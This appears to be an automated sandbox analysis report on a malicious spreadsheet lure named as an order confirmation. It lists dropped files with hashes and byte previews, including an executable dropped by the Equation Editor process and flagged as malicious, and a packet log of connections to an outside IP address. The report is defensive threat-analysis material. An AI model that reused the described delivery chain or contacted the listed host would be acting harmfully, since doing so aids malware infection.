            Preview: ......JFIF.............C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?......W>....r..m(0.Q..k.<A.d~.....u.J.A..........;g.....8..mf=.2k.*....M....J....k.?...~.x....~..~..~.....s.]...G....;...j....8C.P....=..../.o.\.v...C..&...5..F.....U..n,.lmV`._.<.....r..S...z....w[C..v.....8'..ry....~%.?..-m.7.W........p.:q...D.|.+pH..a.67d.o.K......%.kga..ZE....Ea. .&_5.F.L.*8.1F@-%.{n.....F....u[.tM/..m5mm...$.&.I...$L.8..WFh.....de.
            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\608AFF49.png
            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
            File Type:PNG image data, 684 x 477, 8-bit/color RGBA, non-interlaced
            Category:dropped
            Size (bytes):33795
            Entropy (8bit):7.909466841535462
            Encrypted:false
            SSDEEP:768:mEWnXSo70x6wlKcaVH1lvLUlGBtadJubNT4Bw:mTDQx6XH1lvYlbdJux4Bw
            MD5:613C306C3CC7C3367595D71BEECD5DE4
            SHA1:CB5E280A2B1F4F1650040842BACC9D3DF916275E
            SHA-256:A76D01A33A00E98ACD33BEE9FBE342479EBDA9438C922FE264DC0F1847134294
            SHA-512:FCA7D4673A173B4264FC40D26A550B97BD3CC8AC18058F2AABB717DF845B84ED32891F97952D283BE678B09B2E0D31878856C65D40361CC5A5C3E3F6332C9665
            Malicious:false
            Preview: .PNG........IHDR..............T+....)iCCPicc..x..gP......}..m....T).HYz.^E...Y."bC..D..i. ...Q).+.X...X.,....."*(.G.L.{'?..z.w.93..".........~....06|G$/3........Q@.......%:&.......K....\............JJ.. ........@n..3./...f._>..L~...... ......{..T.|ABlL..?-V...ag.......>.......W..@..+..pHK..O.....o....................w..F.......,...{....3......].xY..2....( .L..EP.-..c0.+..'p.o..P..<....C....(.........Z...B7\.kp...}..g .)x.......!"t... J.:...#...qB<.?$..@.T$..Gv"%H9R.4 -.O....r..F. ..,.'...P..D.P....\...@.qh.....{.*..=.v....(*D...`T..)cz..s...0,..c[.b..k..^l.{...9.3..c..8=........2p[q....I\.....7...}....x].%...........f|'..~.?..H .X.M.9...JH$l&....:.W..I...H.!......H..XD.&."^!.....HT....L.#...H..V.e..i..D.#..-...h.&r....K.G."/Q.)..kJ.%...REi...S.S.T.....@.N.....NP?.$h:4.Z8-...v.v.....N.k...at.}/..~....I.!./.&.-.M.V.KdD.(YT].+.A4O.R...=.91.....X..V.Z..bcb...q#qo...R.V...3.D...'.h.B.c..%&..C....1v2..7.SL.S...Ld.0O3.....&.A......$.,...rc%..XgY.X_....R1R{..F.....
            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\69023234.jpeg
            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3
            Category:dropped
            Size (bytes):8815
            Entropy (8bit):7.944898651451431
            Encrypted:false
            SSDEEP:192:Qjnr2Il8e7li2YRD5x5dlyuaQ0ugZIBn+0O2yHQGYtPto:QZl8e7li2YdRyuZ0b+JGgtPW
            MD5:F06432656347B7042C803FE58F4043E1
            SHA1:4BD52B10B24EADECA4B227969170C1D06626A639
            SHA-256:409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
            SHA-512:358FEB8CBFFBE6329F31959F0F03C079CF95B494D3C76CF3669D28CA8CDB42B04307AE46CED1FC0605DEF31D9839A0283B43AA5D409ADC283A1CAD787BE95F0E
            Malicious:false
            Preview: ......JFIF...................................................) ..(...!1!%)-.....383,7(..,...........+...7++++-+++++++++++++++---++++++++-+++++++++++++++++...........".......................................F........................!."1A..QRa.#2BSq......3b.....$c....C...Er.5.........................................................?..x.5.PM.Q@E..I......i..0.$G.C...h..Gt....f..O..U..D.t^...u.B...V9.f..<..t(.kt...d.@...&3)d@@?.q...t..3!.... .9.r.....Q.(:.W..X&..&.1&T.*.K..|kc.....[..l.3(f+.c...:+....5....hHR.0....^R.G..6...&pB..d.h.04.*+..S...M........[....'......J...,...<.O.........Yn...T.!..E*G.[I..-.......$e&........z..[..3.+~..a.u9d.&9K.xkX'.."...Y...l.......MxPu..b..:0e:.R.#.......U....E...4Pd/..0.`.4 ...A...t.....2....gb[)b.I."&..y1..........l.s>.ZA?..........3... z^....L.n6..Am.1m....0../..~.y......1.b.0U...5.oi.\.LH1.f....sl................f.'3?...bu.P4>...+..B....eL....R.,...<....3.0O$,=..K.!....Z.......O.I.z....am....C.k..iZ ...<ds....f8f..R....K
            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\727091C1.jpeg
            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3
            Category:dropped
            Size (bytes):8815
            Entropy (8bit):7.944898651451431
            Encrypted:false
            SSDEEP:192:Qjnr2Il8e7li2YRD5x5dlyuaQ0ugZIBn+0O2yHQGYtPto:QZl8e7li2YdRyuZ0b+JGgtPW
            MD5:F06432656347B7042C803FE58F4043E1
            SHA1:4BD52B10B24EADECA4B227969170C1D06626A639
            SHA-256:409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
            SHA-512:358FEB8CBFFBE6329F31959F0F03C079CF95B494D3C76CF3669D28CA8CDB42B04307AE46CED1FC0605DEF31D9839A0283B43AA5D409ADC283A1CAD787BE95F0E
            Malicious:false
            Preview: ......JFIF...................................................) ..(...!1!%)-.....383,7(..,...........+...7++++-+++++++++++++++---++++++++-+++++++++++++++++...........".......................................F........................!."1A..QRa.#2BSq......3b.....$c....C...Er.5.........................................................?..x.5.PM.Q@E..I......i..0.$G.C...h..Gt....f..O..U..D.t^...u.B...V9.f..<..t(.kt...d.@...&3)d@@?.q...t..3!.... .9.r.....Q.(:.W..X&..&.1&T.*.K..|kc.....[..l.3(f+.c...:+....5....hHR.0....^R.G..6...&pB..d.h.04.*+..S...M........[....'......J...,...<.O.........Yn...T.!..E*G.[I..-.......$e&........z..[..3.+~..a.u9d.&9K.xkX'.."...Y...l.......MxPu..b..:0e:.R.#.......U....E...4Pd/..0.`.4 ...A...t.....2....gb[)b.I."&..y1..........l.s>.ZA?..........3... z^....L.n6..Am.1m....0../..~.y......1.b.0U...5.oi.\.LH1.f....sl................f.'3?...bu.P4>...+..B....eL....R.,...<....3.0O$,=..K.!....Z.......O.I.z....am....C.k..iZ ...<ds....f8f..R....K
            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C3F73A62.png
            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
            File Type:PNG image data, 684 x 477, 8-bit/color RGBA, non-interlaced
            Category:dropped
            Size (bytes):33795
            Entropy (8bit):7.909466841535462
            Encrypted:false
            SSDEEP:768:mEWnXSo70x6wlKcaVH1lvLUlGBtadJubNT4Bw:mTDQx6XH1lvYlbdJux4Bw
            MD5:613C306C3CC7C3367595D71BEECD5DE4
            SHA1:CB5E280A2B1F4F1650040842BACC9D3DF916275E
            SHA-256:A76D01A33A00E98ACD33BEE9FBE342479EBDA9438C922FE264DC0F1847134294
            SHA-512:FCA7D4673A173B4264FC40D26A550B97BD3CC8AC18058F2AABB717DF845B84ED32891F97952D283BE678B09B2E0D31878856C65D40361CC5A5C3E3F6332C9665
            Malicious:false
            Preview: .PNG........IHDR..............T+....)iCCPicc..x..gP......}..m....T).HYz.^E...Y."bC..D..i. ...Q).+.X...X.,....."*(.G.L.{'?..z.w.93..".........~....06|G$/3........Q@.......%:&.......K....\............JJ.. ........@n..3./...f._>..L~...... ......{..T.|ABlL..?-V...ag.......>.......W..@..+..pHK..O.....o....................w..F.......,...{....3......].xY..2....( .L..EP.-..c0.+..'p.o..P..<....C....(.........Z...B7\.kp...}..g .)x.......!"t... J.:...#...qB<.?$..@.T$..Gv"%H9R.4 -.O....r..F. ..,.'...P..D.P....\...@.qh.....{.*..=.v....(*D...`T..)cz..s...0,..c[.b..k..^l.{...9.3..c..8=........2p[q....I\.....7...}....x].%...........f|'..~.?..H .X.M.9...JH$l&....:.W..I...H.!......H..XD.&."^!.....HT....L.#...H..V.e..i..D.#..-...h.&r....K.G."/Q.)..kJ.%...REi...S.S.T.....@.N.....NP?.$h:4.Z8-...v.v.....N.k...at.}/..~....I.!./.&.-.M.V.KdD.(YT].+.A4O.R...=.91.....X..V.Z..bcb...q#qo...R.V...3.D...'.h.B.c..%&..C....1v2..7.SL.S...Ld.0O3.....&.A......$.,...rc%..XgY.X_....R1R{..F.....
            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CABA28C0.jpeg
            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
            File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, progressive, precision 8, 509x209, frames 3
            Category:dropped
            Size (bytes):16706
            Entropy (8bit):7.7803211045289515
            Encrypted:false
            SSDEEP:384:x3+Ep+jY0GYbjcRJAcb8B2dBWWWWWWW6XPApAJz+2Jn+BSNdb7q:lmVsYcb8BQWWWWWWWmnrJn+MNA
            MD5:9984958CFC3A96E32DD6042DD14440DB
            SHA1:ABC82F6AB5C1D7C8BA0CDF10CFDC1F1916F58630
            SHA-256:65EC42573985A8CDA90B901C23F8ECE366493301ADDB12ED0B86F4CD3A48756D
            SHA-512:32DA7ED1AEC317A162BBF75ADA4D500DE3058A7C0953D98CCEC0D26E98313C002AD90E3B551F755A37B58CC34EF2B675E930A634E00524AF2905F119A39F8022
            Malicious:false
            Preview: ......JFIF.....`.`.....C....................................................................C............................................................................".................................................................................>...0D,...!.\.UrI.YLKAV..kAU...M.o....[.+.M.-o.e...1KX.YX...1X...'.X?l.%G..$..B..Y{..k...g.))7M'.+|j..?sg..U..s.....*-.jWb.|..s1e/..Qy..63E..X+..X+..q.....,0F.IE....[.Q>.Q.$.Q).JE..D..K........Xz.Kg.....b.Q....3.~g...5}.u.l9.{..b.[.u....]b....0....$....}`.......M*KdIt..h..9 .1%.@+K%fr`).o.....sr......=...=g.p......=.OO......%.J..J..I.I....u.i.;.....x.;..ag......w.z.9^..\.:S.{...K.]|4(...j..S.i.7+......b..h{>....>....7|1..I{..i.2.OJ.J.ke.x6..sq.......-....^..|>......}.&....$ju..u..^;4..)....W^.HYw...N.._N../Q...G7...>..(.6}-\.._.S'....K...F._....7Es..94..Gg.U...`..wb....a...[...f.*...v..o#..f...i?|..=.h.. ..............T...]<wY"...........................7.{...3..`......................S.....s1..............
            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E1B73268.png
            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
            File Type:PNG image data, 484 x 544, 8-bit/color RGB, non-interlaced
            Category:dropped
            Size (bytes):65050
            Entropy (8bit):7.959940260382877
            Encrypted:false
            SSDEEP:1536:LT3dRSPKeePekFnfpQ6uF2sxiPfqu2RjWn0ZqNnbMXrpLlx6q1F:fdoPI79fpQXtjupn7Nnb8pLll
            MD5:22335141D285E599CDAEF99EABA59D5B
            SHA1:C8E5F6F30E91F2C55D96867CAA2D1E21E7A4804D
            SHA-256:6C0757667F548698B721E4D723768447046B509C1777D6F1474BDE45649D92B0
            SHA-512:CF623DC74B631AAE3DBECF1F8D7E6E129F0C44F882487F367F4CB955A3D5A9AAE96EFD77FB0843BCE84F5F9D4A3C844A42193B7C4F1D374CE147399E1C3A6C2B
            Malicious:false
            Preview: .PNG........IHDR....... ......]....b.zTXtRaw profile type exif..x..Y..8.].9.........L3....UFvU&.d..|q.;..f..^...........j.W..^...RO=..C.....=......N..).._......=........./...........?....Cl.>.......7...~....'..<...W..{o......q..5~..O.;U.ce>.W.Oxn...-.O......w..I........v..s&.|x....:......?..u.??P....y.....}q..'..}.?...........}.j..o...I...K......G.._+.U...?..W..+Nnlq.....z....RX.._...3L.1..9.........8.$.._.\....Ln....%.....fh|...d.|X.7........_....StC......+*.<.7...S\H...i>.{...Nn....../.....#..d.9...s.N..S.P...........Kxr(.1..8....<y|R..@.9.p}......E.....l......"?.Ui....RF~jj.....s...{~.SR..Z.Qo}j...Zk....i..VZm......LX......./..../?.#.g..G.u...;...f.e..f...Y..*.^.....6.................}.{.vk............[...........G..I.....7^...:zgw.)Eo.;.{D)r..B.rV....C._....us..]9...[..n...._...........sk.=..9...z...a......e.7.<Vm;....s.w....o./kq.y.w..:q`;..A({.}...w~<.S..WJ.).Zz.c.#`.xN...1.9..1...k.o. ..-.M|....,..i.[.\.;......8...x.
            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F76D3143.emf
            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
            Category:dropped
            Size (bytes):648132
            Entropy (8bit):2.812378696555446
            Encrypted:false
            SSDEEP:3072:234UL0tS6WB0JOqFB5AEA7rgXuzqn8nG/qc+5:44UcLe0JOcXuunhqcS
            MD5:5766BE17816555642884E7C47E05A022
            SHA1:A04119A2200394234A44DA920D3EAF69B6448897
            SHA-256:76DAA4C2E93071BF16CCA081139786ED3C0B4143AF3D146BAAA98FC6EFCE1944
            SHA-512:1BA7659C0724E3A31C612FF2B6BD9987278226AC555B2EEB1229085538488AE77497FF94E7D199CE3B8C430F84D0F6905807D6D63A97BF6C8B74F526555E5EA6
            Malicious:false
            Preview: ....l...........................m>...!.. EMF........(...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@......................................................%...........%...................................R...p................................@."C.a.l.i.b.r.i......................................................W$.......f.X.@..%......0............RQ.Y.............x..$Q.Y...... ...Id.X...... .........2..d.X............O...........................%...X...%...7...................{$..................C.a.l.i.b.r.i........... ..X..........8.W......2.dv......%...........%...........%...........!..............................."...........%...........%...........%...........T...T..........................@.E.@............L.......................P... ...6...F...$.......EMF+*@..$..........?...........?.........@...........@..........*@..$..........?....
            C:\Users\user\AppData\Local\Temp\9rvscd0j0b4n1ow
            Process:C:\Users\Public\vbc.exe
            File Type:data
            Category:dropped
            Size (bytes):250367
            Entropy (8bit):7.980938283317405
            Encrypted:false
            SSDEEP:6144:VNFhwVfYAwfRHQKsX8utbhrAqajbLGyKDE9fh/U2XGNFhwz:VkwJyBbhgyDWfh/U2XGC
            MD5:F817F157A6262B51A43656375EF8963C
            SHA1:F95D2338451B2259E6226A89360132108AB44E96
            SHA-256:8B49F9768520B9B451F1B5A0A4817A75C4411852DC24DEDA95BF6A8AB965DDED
            SHA-512:E394760069E3908B8984A849E3348634499C6AB2F0B91A574108B553FFC5D45108A536D9501C757DF5AE7FC167771691F2A53A7B983337BF60A6967562F53BEC
            Malicious:false
            Preview: .w.L.= ..'.2...U..s.......l..|9*I..Z.j.J...A.W........qI..l!...u.O..ONZ1.+/yB....\...=YZ.<(...2.%.....,.....A....|-.<.6.Py.3.%7....IS[.1^[.H..[]a...>..)...."...n8...H....q..o....6...q.4W.(~....i....93..O..'..1........Qh..c.;M.I..(...@..Z..<.........8L....t..t..U..s..w....l.|9.I..Z.jO...-A.D....w..vqI.xl!.....x...s.V....\._..F.;B."D(R..*..K..S.OMh.}...(.#.|-.<.6.P.(3.M7....IS..1^[.H..[]a...>..)...S...n8...H....q..o....6...q....~....i....93..O..'..1........Qh..c.;M.I..(...@..Z..........U8L.. ...2t..U..s.....Y.g...kA...Z.j.....A..........qI.Il!^....x...uXV.........F.;B.R)(R........S..OM..8..P=.#....<.W.P=.3..7....IS[.1^[.H..[.g.5">..)Z..."h..n8...H....q..o....6....^A~.6...i..#.93Y.O.'..1........Qh..c..(...(.mv@....<]......~.8L.= ..'.2y..r%Q3ZT....Y.lh.|9.I..m.j.J...A.W..S..w..qI.Il!^.....'..s.V....\....F.;B.JD($........S..OM..}.....#.|-.<.6.Py.3.%7....IS[.1^[.H..[]a...>..)...."...n8...H....q..o....6...q.4W.(~....i....93..O..'..1........Qh..c.
            C:\Users\user\AppData\Local\Temp\nsd99E0.tmp\hmrrcvb.dll
            Process:C:\Users\Public\vbc.exe
            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
            Category:dropped
            Size (bytes):49152
            Entropy (8bit):6.227672422736112
            Encrypted:false
            SSDEEP:768:2iEPJiW4uUH/2fUnxzvRyMLvNdmUEKRnJyQuEA3B2lVNDQMZCiv+l08w2jIRo1iM:4PJiW41nj3TY0Civ+l0eZHVuIXxNSDqF
            MD5:8F1756B3FECE1D28C57CABFF0FDA9AB1
            SHA1:1D81CB4C36DA87BEE907656F9E77B1E5B159B3F0
            SHA-256:65EFE70F4FEAE095EA7A9497007F2307F49572A8878AC5D304B66DD3AC0DDFB0
            SHA-512:79AEAE44E83647486682A7E3BF387522FEEDDC9252766109C3A0837758F3A88DDC77BB84DE84F76742ABAD61F8A5517BA7B71E9E2DADAD274E621C44D050A040
            Malicious:true
            Antivirus:
            • Antivirus: Joe Sandbox ML, Detection: 100%
            • Antivirus: Virustotal, Detection: 15%, Browse
            • Antivirus: ReversingLabs, Detection: 2%
            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l.3...`...`...`.o.a...`.o.a...`...`...`vS.a...`vS.a...`sS6`...`vS.a...`Rich...`........PE..L....rQa...........!.....j...R............................................................@.........................0...H...t........................................................................................................................text....h.......j.................. ..`.bss.....................................rdata..,............n..............@..@.data....6.......8...~..............@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................
            C:\Users\user\Desktop\~$ORDERCONFIRMATION_00001679918.xlsx
            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
            File Type:data
            Category:dropped
            Size (bytes):330
            Entropy (8bit):1.4377382811115937
            Encrypted:false
            SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
            MD5:96114D75E30EBD26B572C1FC83D1D02E
            SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
            SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
            SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
            Malicious:true
            Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
            C:\Users\Public\vbc.exe
            Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
            File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
            Category:dropped
            Size (bytes):288145
            Entropy (8bit):7.911369635258899
            Encrypted:false
            SSDEEP:6144:F8LxBsj6b2HwEll/tCJhrAqajbLGv+qRACwWBRNZP:/ObIwElpshg0aCzBV
            MD5:A9DCC61F31601E771050463C4D41CDB0
            SHA1:C26979F1842C9F2460FC9E0F9285266B0D175B49
            SHA-256:E018D5F9CE45E81A96459FA0C717DF76B2D765F24A9A472AD2CB8D13B523F562
            SHA-512:7C592E8F6042BEA65CBD5261B0150C761B4B724E61E983DC32C2E3BE62B48D1ACAC53986DB097FE4C79A597D928F8E17FFCB639B6FC45623229719136548E6A6
            Malicious:true
            Antivirus:
            • Antivirus: Joe Sandbox ML, Detection: 100%
            • Antivirus: Virustotal, Detection: 42%, Browse
            • Antivirus: ReversingLabs, Detection: 20%
            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........0(..QF..QF..QF.*^...QF..QG.qQF.*^...QF.rv..QF..W@..QF.Rich.QF.........PE..L...m:.V.................`..........*1.......p....@.........................................................................$u.......p...............................................................................p..|............................text...f^.......`.................. ..`.rdata.......p.......d..............@..@.data....]...........x..............@....ndata...................................rsrc........p.......~..............@..@................................................................................................................................................................................................................................................................................................................................................................

            Static File Info

            General

            File type:CDFV2 Encrypted
            Entropy (8bit):7.991141972870768
            TrID:
            • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
            File name:ORDERCONFIRMATION_00001679918.xlsx
            File size:520680
            MD5:9c34f5c5e1a78c24947c3fe5fce601ea
            SHA1:727aa4c09c4c4f40d47ba87fa91921876b79f0f3
            SHA256:ff1168daa5edebf6c75a6f24573e0b1e8153156b47e9c91712f8aa7968d745db
            SHA512:8838c18cac9416a7bcac561276b7cda9eee605ea347af8cddcb87b00fec953238a89505305e792053e36858072b41b65f5325c70c4afadb02a64f743ddaeab2e
            SSDEEP:12288:fvzKH+eauZEGfWpHNP50my01T9W+SZTeZeUlwQeFzVZtu3HOFDZcu4Gs:fvGg8fwHNPOmy0/WNTeZeUlwQe+3Hc4
            File Content Preview:........................>...............................................................................z......................................................................................................................................................

            File Icon

            Icon Hash:e4e2aa8aa4b4bcb4

            Network Behavior

            Network Port Distribution

            TCP Packets

            TimestampSource PortDest PortSource IPDest IP
            Sep 27, 2021 21:08:39.438623905 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:39.563318014 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:39.563460112 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:39.563868999 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:39.688463926 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:39.688507080 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:39.688529968 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:39.688546896 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:39.688555002 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:39.688582897 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:39.688589096 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:39.688594103 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:39.809499979 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:39.809525013 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:39.809588909 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:39.809607029 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:39.809647083 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:39.809777021 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:39.809936047 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:39.809967995 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:39.810034037 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:39.930754900 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:39.930810928 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:39.931988955 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:39.932022095 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:39.932039976 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:39.932044983 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:39.932054996 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:39.932080030 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:39.932121038 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:39.932143927 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:39.932158947 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:39.932164907 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:39.932183027 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:39.932199955 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:39.932219028 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:39.932241917 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:39.932252884 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:39.932281971 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:40.051249027 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:40.051338911 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:40.052599907 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:40.052633047 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:40.052658081 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:40.052700996 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:40.052726984 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:40.052747965 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:40.052762985 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:40.052773952 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:40.052804947 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:40.052834988 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:40.052850008 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:40.052879095 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:40.052901030 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:40.052947044 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:40.056720972 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:40.059871912 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:40.171833038 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:40.171900988 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:40.172940969 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:40.172964096 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:40.172983885 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:40.173000097 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:40.173027992 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:40.173038960 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:40.173048973 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:40.173075914 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:40.292351007 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:40.292385101 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:40.292663097 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:40.293124914 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:40.293152094 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:40.293195963 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:40.293204069 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:40.293217897 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:40.293243885 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:40.293258905 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:40.293271065 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:40.293308020 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:40.413671970 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:40.413717985 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:40.413733959 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:40.413897038 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:40.413991928 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:40.414014101 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:40.414047956 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:40.414068937 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:40.414089918 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:40.414108992 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:40.534255028 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:40.534305096 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:40.534346104 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:40.534390926 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:40.534429073 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:40.534445047 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:40.534467936 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:40.534509897 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:40.534519911 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:40.534524918 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:40.534528971 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:40.534543037 CEST804916723.94.159.204192.168.2.22
